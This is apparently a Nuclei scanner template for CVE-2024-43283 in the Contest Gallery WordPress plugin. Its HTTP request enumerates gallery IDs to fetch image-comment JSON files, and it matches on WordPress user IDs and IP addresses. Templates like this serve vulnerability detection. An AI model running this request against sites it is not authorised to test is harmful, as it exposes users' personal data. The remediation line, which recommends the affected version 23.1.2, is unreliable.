Contest Gallery - Broken Access Control

id: CVE-2024-43283

info:
  name: Contest Gallery - Broken Access Control
  author: popcorn94
  severity: medium
  description: |
    Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
  impact: |
    Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
  remediation: |
    Update to the latest version 23.1.2 or later to address the issue.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43283
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-43283
    epss-score: 0.156
    epss-percentile: 0.94781
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure,vkev

http:
  - raw:
      - |
        GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path: helpers/wordlists/numbers.txt
    attack: batteringram

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WpUserId":'
          - 'userIP":'
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a004630440220584a6affeafd1aa9fbebe60bf3066f7d3b888b73225404408a79ed08a254e36f0220019222bca85da56cac09160c5268e07627bed04f253b9bd693df256fde09f35e:922c64590222798bb761d5b6d8e72950